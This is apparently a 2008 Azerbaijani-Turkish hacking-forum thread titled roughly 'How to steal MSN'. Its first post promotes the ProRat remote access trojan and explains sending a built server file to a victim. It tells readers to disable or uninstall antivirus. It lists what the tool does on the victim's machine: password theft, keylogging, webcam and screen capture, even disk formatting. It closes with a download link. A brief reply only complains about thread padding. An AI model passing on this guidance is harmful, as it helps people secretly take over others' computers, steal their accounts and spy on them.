www.AzHacker.TK
Would you like to react to this message? Create an account in a few clicks or log in to continue.

www.AzHacker.TK

Azhacker

AnasayfaLatest imagesQeydiyyatdan keçinGiriş

MSN nece calinir

2 posters
MüəllifIsmarıc
M-0A5
Web Masters
Web Masters
M-0A5

İsmarıc sayı : 50
Seher Ve Olke : AzerBayCan BaKu
Registration date : 18/09/08

MSN nece calinir Empty
Yeni mövzuMövzu: MSN nece calinir   MSN nece calinir I_icon_minitimeB. Dek. 07, 2008 3:41 pm

MSN kullanici bilgileri ele gecirmenin bi cok yolu vardir fakat ben kendi kullandigim yolu anlatmak istiyorum ki bu yolla tek yapacaginiz MSN calmak degil PC'yi ele gecirmek olacaktir...
Bu programın adı Prorat surumu v1.9 dur.

Ilk Once ProRat Nedir Onu Anlatayim isterseniz;

ProRat PRO gruba ait bir Uzaktan Bilgisayar Yönetim aracıdır.

Kullanım Koşulları :

Prorat ile bir server oluşturup diğer kullanıcı ya gönderip bu kullanıcı server dosyasını açarsa bilgisayarını tamamen kontrol edebilirsinzi. Klavye Işıkları , ekran görüntüsü vs. vs. vs. Uzun süredir üzerinde yoğun çalışılan ProRat v1.9 Fix2 tamamlandı ve kullanımınıza sunuldu. Bu versiyonda eski versiyonda bulunan birçok hata düzeltildi ve bir çok yeni özelliklik eklendi. PRO Group olarak eski versiyon ProRat serverlarınızı ProRat v1.9 Fix2 güncellemenizi öneririz. ProAgent 2.1 in Türünde olan bu program kullanım amaçları aynıdır.

NOT: programın calışması için anti vırus programlarını silmeniz ya da devre disi birakmaniz lazım.Eger ekle kaldırdan anti-vıruslerı sılmessenız programdan tam verım alamassınız.Anti virusler olusturdugunuz serverlari ve Prorat exe(uygulama) dosyasini silecektir ve siz de kullanamayacaksiniz, hack yapamassınız.silmeden yukledıysenız silip bastan yukleyiniz.

bu programla karsı pc de;

cd-room acabılır
kurbandan program indirebılır
butun şifreleri calabılır
Cam dan goruntu alabılır
ekran goruntusu alabılır
ekranı ters cevırebılır
mouse kılıtleyebılır
pc ye yenıden baslat weya kapat komutlarını werebılır
keylogger koyabılır -Key logger sayesinde Nerede ne yazmish tamamini gorebilirsiniz(MSN Hack icin kullanilabilir)
Bir chat penceresi acabilirsiniz(bu pencere sizde kucuk bir pencere olacak fakat karsi tarafin ekrani chat ekraniyla kaplanacak yani tam ekran olacak ve siz istemedikce o chattten cıkamaz.
hatta disklere format bıle atabılırsınız.-Tavsiye etmiyorum.

bunlar bır kacıydı arkadaslar kolay gelsin.

buyrun link http://uploaded.to/?id=bmwhy8

-Kolay gelsin iyi eglenceler..
Əvvələ qayıt Aşağa gitmek
KInG

İsmarıc sayı : 9
Registration date : 12/01/09

MSN nece calinir Empty
Yeni mövzuMövzu: Geri: MSN nece calinir   MSN nece calinir I_icon_minitimeB.e. Yan. 12, 2009 5:37 am

Qaqas men oz forumumda bir movzu acanda bir program verende birinci onu yoxlayiram sonra foruma daxil edirem.Movzu coxaltmaq bele seyleri yazmasan yaxsi olar.
Əvvələ qayıt Aşağa gitmek
http://www.forumazeri.tk

MSN nece calinir
Əvvələ qayıt 
1 səhifə (Cəmi 1 səhifə)